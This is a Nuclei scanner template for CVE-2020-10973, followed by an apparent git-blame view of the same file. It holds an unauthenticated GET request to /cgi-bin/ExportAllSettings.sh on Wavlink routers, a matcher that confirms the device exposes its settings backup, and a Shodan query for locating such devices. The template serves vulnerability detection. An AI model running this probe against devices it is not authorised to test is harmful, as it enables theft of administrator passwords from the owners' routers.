nuclei-templates/cves/2020/CVE-2020-10973.yaml

id: CVE-2020-10973

info:
  name: Wavlink WN530HG4 - Access Control
  author: arafatansari
  severity: high
  description: |
    An issue was discovered in Wavlink WN530HG4, Wavlink WN531G3, Wavlink WN533A8, and Wavlink WN551K1 affecting /cgi-bin/ExportAllSettings.sh where a crafted POST request returns the current configuration of the device, including the administrator password. No authentication is required. The attacker must perform a decryption step, but all decryption information is readily available.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2020-10973
  classification:
    cve-id: CVE-2020-10973
  metadata:
    verified: true
    shodan-query: http.html:"WN551K1"
  tags: cve,cve2020,exposure,wavlink

requests:
  - raw:
      - |
        GET /cgi-bin/ExportAllSettings.sh HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'url=/backupsettings.dat'

      - type: status
        status:
          - 200
Create CVE-2020-10973.yaml 2022-08-14 11:56:35 +00:00			`id: CVE-2020-10973`

			`info:`
			`name: Wavlink WN530HG4 - Access Control`
			`author: arafatansari`
Update CVE-2020-10973.yaml 2022-08-14 12:39:55 +00:00			`severity: high`
Create CVE-2020-10973.yaml 2022-08-14 11:56:35 +00:00			`description: \|`
			`An issue was discovered in Wavlink WN530HG4, Wavlink WN531G3, Wavlink WN533A8, and Wavlink WN551K1 affecting /cgi-bin/ExportAllSettings.sh where a crafted POST request returns the current configuration of the device, including the administrator password. No authentication is required. The attacker must perform a decryption step, but all decryption information is readily available.`
			`reference:`
Update CVE-2020-10973.yaml 2022-08-14 12:23:26 +00:00			`- https://nvd.nist.gov/vuln/detail/CVE-2020-10973`
Update CVE-2020-10973.yaml 2022-08-14 12:37:55 +00:00			`classification:`
			`cve-id: CVE-2020-10973`
Create CVE-2020-10973.yaml 2022-08-14 11:56:35 +00:00			`metadata:`
Update CVE-2020-10973.yaml 2022-08-14 12:23:26 +00:00			`verified: true`
Create CVE-2020-10973.yaml 2022-08-14 11:56:35 +00:00			`shodan-query: http.html:"WN551K1"`
Update CVE-2020-10973.yaml 2022-08-14 12:37:55 +00:00			`tags: cve,cve2020,exposure,wavlink`
Create CVE-2020-10973.yaml 2022-08-14 11:56:35 +00:00
			`requests:`
			`- raw:`
			`- \|`
			`GET /cgi-bin/ExportAllSettings.sh HTTP/1.1`
			`Host: {{Hostname}}`

			`matchers-condition: and`
			`matchers:`
			`- type: word`
Update CVE-2020-10973.yaml 2022-08-14 12:23:26 +00:00			`part: body`
Create CVE-2020-10973.yaml 2022-08-14 11:56:35 +00:00			`words:`
			`- 'url=/backupsettings.dat'`
Update CVE-2020-10973.yaml 2022-08-14 12:23:26 +00:00
			`- type: status`
			`status:`
			`- 200`